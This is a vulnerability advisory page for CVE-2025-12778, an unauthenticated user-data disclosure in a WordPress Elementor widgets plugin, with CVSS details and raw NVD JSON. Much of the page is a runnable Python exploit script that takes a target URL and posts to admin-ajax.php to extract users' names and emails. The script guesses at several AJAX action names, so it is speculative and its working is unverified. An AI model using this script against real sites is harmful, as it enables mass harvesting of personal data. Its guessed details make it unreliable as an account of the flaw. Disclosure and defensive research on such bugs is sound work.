Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-12778 CVSS 5.3 MEDIUM

CVE-2025-12778

Published: 2025-11-20 15:17:23
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Ultimate Member Widgets for Elementor – WordPress User Directory plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_filter_users function in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to extract partial metadata of all WordPress users, including their first name, last name and email addresses.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Ultimate Member Widgets for Elementor <= 2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12778 PoC - Unauthorized User Metadata Access # Target: WordPress with Ultimate Member Widgets for Elementor <= 2.3 import requests import json import sys def exploit_cve_2025_12778(target_url): """ Exploit for CVE-2025-12778: Missing capability check in handle_filter_users Allows unauthenticated attackers to extract WordPress user metadata """ # Target WordPress site target = target_url.rstrip('/') # AJAX endpoint - typical WordPress admin-ajax.php location ajax_url = f"{target}/wp-admin/admin-ajax.php" # Prepare the exploit payload # The exact action name depends on the plugin's registered AJAX hook # Common patterns: um_elementor_filter_users, handle_filter_users, etc. exploit_payloads = [ {"action": "um_elementor_filter_users", "method": "POST"}, {"action": "handle_filter_users", "method": "POST"}, {"action": "um_get_users", "method": "POST"} ] headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print(f"[*] Target: {target}") print(f"[*] CVE-2025-12778 - Missing Capability Check in Ultimate Member Widgets") print("="*60) for payload in exploit_payloads: try: print(f"\n[*] Testing action: {payload['action']}") # Send the exploit request (no authentication required) data = { "action": payload['action'], "filter_type": "all", "page": 1 } response = requests.post( ajax_url, data=data, headers=headers, timeout=10, verify=False ) # Check if we got user data in response if response.status_code == 200: try: json_response = response.json() if json_response and 'data' in str(json_response).lower(): print(f"[!] VULNERABLE! Found user data with action: {payload['action']}") print(f"[+] Response preview: {str(json_response)[:500]}") return json_response except: # Response might not be JSON, check raw content if "email" in response.text.lower() or "user" in response.text.lower(): print(f"[!] VULNERABLE! Found user data in response") print(f"[+] Response preview: {response.text[:500]}") return response.text print(f"[-] Action {payload['action']} did not return user data") except requests.exceptions.RequestException as e: print(f"[-] Error with {payload['action']}: {e}") print("\n[*] Manual verification may be required") print("[*] Check the plugin's source code for the correct AJAX action name") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_12778_poc.py <target_url>") print("Example: python cve_2025_12778_poc.py http://target-site.com") sys.exit(1) target_url = sys.argv[1] result = exploit_cve_2025_12778(target_url) if result: print("\n[+] Exploitation successful - user metadata extracted") else: print("\n[-] Exploitation failed or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12778", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:23.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ultimate Member Widgets for Elementor – WordPress User Directory plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_filter_users function in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to extract partial metadata of all WordPress users, including their first name, last name and email addresses."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3397029/ultimate-member-widgets-for-elementor", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a917a24b-09cc-48e9-844a-e1ed573a708f?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.